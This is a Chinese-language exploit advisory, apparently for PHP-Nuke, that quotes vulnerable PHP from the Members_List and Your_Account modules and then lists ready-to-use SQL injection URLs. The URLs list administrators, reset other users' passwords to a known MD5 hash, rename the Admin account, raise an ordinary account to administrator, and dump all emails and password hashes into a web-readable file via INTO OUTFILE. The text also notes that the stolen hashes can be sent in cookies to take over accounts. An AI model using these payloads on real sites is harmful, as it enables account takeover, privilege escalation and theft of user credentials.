SQL的Members_List、Your_Account模块中存在注入缺陷。如果magic_quotes_gpc选项为“OFF”,攻击者使用下列攻击方法及代码能利用该缺陷:
PHP代码/位置:
?/modules/Members_List/index.php :
------------------------------------------------------------------------
[...]
$count = "SELECT COUNT(uid) AS total FROM ".$user_prefix."_users ";
$select = "select uid, name, uname, femail, url from
".$user_prefix."_users ";
$where = "where uname != Anonymous ";
if ( ( $letter != "Other" ) AND ( $letter != "All" ) ) {
$where .= "AND uname like ".$letter."% ";
} else if ( ( $letter == "Other" ) AND ( $letter != "All" ) ) {
$where .= "AND uname REGEXP "^\[1-9]" ";
} else {
$where .= "";
}
$sort = "order by $sortby";
$limit = " ASC LIMIT ".$min.", ".$max;
$count_result = sql_query($count.$where, $dbi);
$num_rows_per_order = mysql_result($count_result,0,0);
$result = sql_query($select.$where.$sort.$limit, $dbi) or die();
echo "
1<br/>
";
if ( $letter != "front" ) {
echo "
1<table border='\"0\"' cellspacing='\"1\"' width='\"100%\"'><tr>\n";
2echo "<td align='\"center\"' bgcolor='\"$bgcolor4\"'><font color='\"$textcolor2\"'><b>"._NICKNAME."</b></font></td>\n";
3echo "<td align='\"center\"' bgcolor='\"$bgcolor4\"'><font color='\"$textcolor2\"'><b>"._REALNAME."</b></font></td>\n";
4echo "<td align='\"center\"' bgcolor='\"$bgcolor4\"'><font color='\"$textcolor2\"'><b>"._EMAIL."</b></font></td>\n";
5echo "<td align='\"center\"' bgcolor='\"$bgcolor4\"'><font color='\"$textcolor2\"'><b>"._URL."</b></font></td>\n";
6$cols = 4;
7[...]
8\------------------------------------------------------------------------
9
10/modules/Your_Account/index.php :
11switch($op) {
12[...]
13case "mailpasswd":
14mail_password($uname, $code);
15break;
16
17case "userinfo":
18userinfo($uname, $bypass, $hid, $url);
19break;
20
21case "login":
22login($uname, $pass);
23break;
24[...]
25case "saveuser":
26saveuser($uid, $realname, $uname, $email, $femail, $url, $pass, $vpass,
27$bio, $user_avatar, $user_icq, $user_occ, $user_from, $user_intrest,
28$user_sig, $user_aim, $user_yim, $user_msnm, $attach, $newsletter);
29break;
30[...]
31case "savehome":
32savehome($uid, $uname, $storynum, $ublockon, $ublock, $broadcast,
33$popmeson);
34break;
35
36case "savetheme":
37savetheme($uid, $theme);
38break;
39[...]
40case "savecomm":
41savecomm($uid, $uname, $umode, $uorder, $thold, $noscore, $commentmax);
42break;
43[...]
44}
45\------------------------------------------------------------------------
46
47/modules/Your_Account/index.php :
48[...]
49function saveuser($uid, $realname, $uname, $email, $femail, $url, $pass,
50$vpass, $bio, $user_avatar, $user_icq, $user_occ, $user_from, $user_intrest,
51$user_sig, $user_aim, $user_yim, $user_msnm, $attach, $newsletter) {
52global $user, $Cookie, $userinfo, $EditedMessage, $user_prefix, $dbi,
53$module_name;
54Cookiedecode($user);
55$check = $Cookie[1];
56$check2 = $Cookie[2];
57$result = sql_query("select uid, pass from ".$user_prefix."_users where
58uname=$check", $dbi);
59list($vuid, $ccpass) = sql_fetch_row($result, $dbi);
60if (($uid == $vuid) AND ($check2 == $ccpass)) {
61if (!eregi("http://";, $url)) {
62$url = "http://$url";
63}
64if ((isset($pass)) && ("$pass" != "$vpass")) {
65echo "<center>"._PASSDIFFERENT."</center>";
66} elseif (($pass != "") && (strlen($pass) < $minpass)) {
67echo "<center>"._YOUPASSMUSTBE." <b>$minpass</b>
68"._CHARLONG."</center>";
69} else {
70if ($bio) { filter_text($bio); $bio = $EditedMessage; $bio =
71FixQuotes($bio); }
72if ($pass != "") {
73Cookiedecode($user);
74sql_query("LOCK TABLES ".$user_prefix."_users WRITE", $dbi);
75$pass = md5($pass);
76sql_query("update ".$user_prefix."_users set name=$realname,
77email=$email, femail=$femail, url=$url, pass=$pass, bio=$bio ,
78user_avatar=$user_avatar, user_icq=$user_icq, user_occ=$user_occ,
79user_from=$user_from, user_intrest=$user_intrest, user_sig=$user_sig,
80user_aim=$user_aim, user_yim=$user_yim, user_msnm=$user_msnm,
81newsletter=$newsletter where uid=$uid", $dbi);
82$result = sql_query("select uid, uname, pass, storynum, umode, uorder,
83thold, noscore, ublockon, theme from ".$user_prefix."_users where
84uname=$uname and pass=$pass", $dbi);
85if(sql_num_rows($result, $dbi)==1) {
86$userinfo = sql_fetch_array($result, $dbi);
87
88doCookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],
89$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],
90$userinfo[theme],$userinfo[commentmax]);
91} else {
92echo "<center>"._SOMETHINGWRONG."</center><br/>";
93}
94sql_query("UNLOCK TABLES", $dbi);
95} else {
96sql_query("update ".$user_prefix."_users set name=$realname,
97email=$email, femail=$femail, url=$url, bio=$bio,
98user_avatar=$user_avatar, user_icq=$user_icq, user_occ=$user_occ,
99user_from=$user_from, user_intrest=$user_intrest, user_sig=$user_sig,
100user_aim=$user_aim, user_yim=$user_yim, user_msnm=$user_msnm,
101newsletter=$newsletter where uid=$uid", $dbi);
102if ($attach) {
103$a = 1;
104} else {
105$a = 0;
106}
107}
108Header("Location: modules.php?name=$module_name");
109}
110}
111}
112[...]
113function savehome($uid, $uname, $storynum, $ublockon, $ublock, $broadcast,
114$popmeson) {
115global $user, $Cookie, $userinfo, $user_prefix, $dbi, $module_name;
116Cookiedecode($user);
117$check = $Cookie[1];
118$check2 = $Cookie[2];
119$result = sql_query("select uid, pass from ".$user_prefix."_users where
120uname=$check", $dbi);
121list($vuid, $ccpass) = sql_fetch_row($result, $dbi);
122if (($uid == $vuid) AND ($check2 == $ccpass)) {
123if(isset($ublockon)) $ublockon=1; else $ublockon=0;
124$ublock = FixQuotes($ublock);
125sql_query("update ".$user_prefix."_users set storynum=$storynum,
126ublockon=$ublockon, ublock=$ublock, broadcast=$broadcast,
127popmeson=$popmeson where uid=$uid", $dbi);
128getusrinfo($user);
129doCookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],$userinfo[umode],
130$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],
131$userinfo[theme],$userinfo[commentmax]);
132Header("Location: modules.php?name=$module_name");
133}
134}
135
136function savetheme($uid, $theme) {
137global $user, $Cookie, $userinfo, $user_prefix, $dbi, $module_name;
138Cookiedecode($user);
139$check = $Cookie[1];
140$check2 = $Cookie[2];
141$result = sql_query("select uid, pass from ".$user_prefix."_users where
142uname=$check", $dbi);
143list($vuid, $ccpass) = sql_fetch_row($result, $dbi);
144if (($uid == $vuid) AND ($check2 == $ccpass)) {
145sql_query("update ".$user_prefix."_users set theme=$theme where
146uid=$uid", $dbi);
147getusrinfo($user);
148doCookie($userinfo[uid],$userinfo[uname],$userinfo[pass],$userinfo[storynum],
149$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],$userinfo[ublockon],
150$userinfo[theme],$userinfo[commentmax]);
151Header("Location: modules.php?name=$module_name&theme=$theme");
152}
153}
154[...]
155function savecomm($uid, $uname, $umode, $uorder, $thold, $noscore,
156$commentmax) {
157global $user, $Cookie, $userinfo, $user_prefix, $dbi, $module_name;
158Cookiedecode($user);
159$check = $Cookie[1];
160$check2 = $Cookie[2];
161$result = sql_query("select uid, pass from ".$user_prefix."_users where
162uname=$check", $dbi);
163list($vuid, $ccpass) = sql_fetch_row($result, $dbi);
164if (($uid == $vuid) AND ($check2 == $ccpass)) {
165if(isset($noscore)) $noscore=1; else $noscore=0;
166sql_query("update ".$user_prefix."_users set umode=$umode,
167uorder=$uorder, thold=$thold, noscore=$noscore,
168commentmax=$commentmax where uid=$uid", $dbi);
169getusrinfo($user);
170doCookie($userinfo[uid],$userinfo[uname],$userinfo[pass],
171$userinfo[storynum],$userinfo[umode],$userinfo[uorder],$userinfo[thold],$userinfo[noscore],
172$userinfo[ublockon],$userinfo[theme],$userinfo[commentmax]);
173Header("Location: modules.php?name=$module_name");
174}
175}
176[...]
177\------------------------------------------------------------------------
178
179/modules/Your_Account/index.php :
180[...]
181function mail_password($uname, $code) {
182global $sitename, $adminmail, $nukeurl, $user_prefix, $dbi,
183$module_name;
184$result = sql_query("select email, pass from ".$user_prefix."_users
185where (uname=$uname)", $dbi);
186if(!$result) {
187include("header.php");
188OpenTable();
189echo "<center>"._SORRYNOUSERINFO."</center>";
190CloseTable();
191include("footer.php");
192[...]
193\------------------------------------------------------------------------
194
195
196\------------------------------------------------------------------------
197[...]
198function userinfo($uname, $bypass=0, $hid=0, $url=0) {
199global $user, $Cookie, $sitename, $prefix, $user_prefix, $dbi, $admin,
200$broadcast_msg, $my_headlines, $module_name;
201$result = sql_query("select uid, femail, url, bio, user_avatar,
202user_icq, user_aim, user_yim, user_msnm, user_from, user_occ, user_intrest,
203user_sig, pass, newsletter from ".$user_prefix."_users where
204uname=$uname", $dbi);
205$userinfo = sql_fetch_array($result, $dbi);
206[...]
207\------------------------------------------------------------------------
208
209
210\------------------------------------------------------------------------
211[...]
212function login($uname, $pass) {
213global $setinfo, $user_prefix, $dbi, $module_name;
214$result = sql_query("select pass, uid, storynum, umode, uorder, thold,
215noscore, ublockon, theme, commentmax from ".$user_prefix."_users where
216uname=$uname", $dbi);
217$setinfo = sql_fetch_array($result, $dbi);
218[...]
219}
220[...]
221\------------------------------------------------------------------------
222---
223
224
225Members_List模块:
226
227\- 显示用户:
228
229http://[target]/modules.php?name=Members_List&letter=All&sortby=pass
230
231\- 显示用户:
232
233http://[target]/modules.php?name=Members_List&letter=All&sortby=uid
234
235\- 显示moderators :
236
237http://[target]/modules.php?name=Members_List&letter=%20OR%20user_level=2/*
238
239\- 显示管理员:
240
241http://[target]/modules.php?name=Members_List&letter=%20OR%20user_level=4/*
242
243\- 显示所有以“abc”开头的用户 :
244
245http://[target]/modules.php?name=Members_List&letter=%20OR%20pass%20LIKE%20abc%25/*
246
247Your_Account模块 :
248
249\- 将“Admind”用户更名为“Hophophop” :
250
251http://[target]/modules.php?name=Your_Account&op=savetheme&theme=,name=Hophophop%20where%20uname=Admin/*&uid=[OUR_UID]
252
253\- 在md5_decrypted中将“Bob”的密码改为“d41d8cd98f00b204e9800998ecf8427e”:
254
255http://[target]/modules.php?name=Your_Account&op=savetheme&theme=,
256pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&uid=[OUR_UID]
257或:
258
259http://[target]/modules.php?name=Your_Account&op=saveuser&realname=,
260pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&uid=[OUR_UID]
261或:
262
263http://[target]/modules.php?name=Your_Account&op=saveuser&email=,
264pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&uid=[OUR_UID]
265或:
266
267http://[target]/modules.php?name=Your_Account&op=savehome&storynum=,
268pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&uid=[OUR_UID]
269或:
270
271http://[target]/modules.php?name=Your_Account&op=savehome&ublockon=,
272pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&uid=[OUR_UID]
273或:
274
275http://[target]/modules.php?name=Your_Account&op=savecomm&umode=,
276pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&uid=[OUR_UID]
277或:
278
279http://[target]/modules.php?name=Your_Account&op=savecomm&thold=,
280pass=d41d8cd98f00b204e9800998ecf8427e%20where%20uname=Bob/*&uid=[OUR_UID]
281
282\- 将普通用户提升至管理员权限:
283
284http://[target]/modules.php?name=Your_Account&op=savetheme&theme=,user_level=4&uid=[OUR_UID]
285
286或:
287
288http://[target]/modules.php?name=Your_Account&op=saveuser&femail=,user_level=4&uid=[OUR_UID]
289
290或:
291
292http://[target]/modules.php?name=Your_Account&op=saveuser&url=http://,user_level=4&uid=[OUR_UID]
293
294或:
295
296http://[target]/modules.php?name=Your_Account&op=savehome&broadcast=,user_level=4&uid=[OUR_UID]
297
298或:
299
300http://[target]/modules.php?name=Your_Account&op=savecomm&uorder=,user_level=4&uid=[OUR_UID]
301
302\- 将所有用户的电子邮件和crypted密码保存在http://[target]/AllMailPass.txt中 :
303
304http://[target]/modules.php?name=Your_Account&op=mailpasswd&uname=)
305%20OR%201=1%20INTO%20OUTFILE%20/[path/to/site]/AllMailPass.txt/*
306
307利用Cookie发送crypted密码能访问用户帐户。
308
309\- 将用户的所有信息保存在http://[target]/admintxt中:
310
311http://[target]/modules.php?name=Your_Account&op=login&uname=%20OR%user_level>
3121%20INTO%20OUTFILE%20/[path/to/site]/admin.txt
313
314[path/to/site]能在http://[target]/modules/Forums/bb_smilies.php中查询到。</tr></table>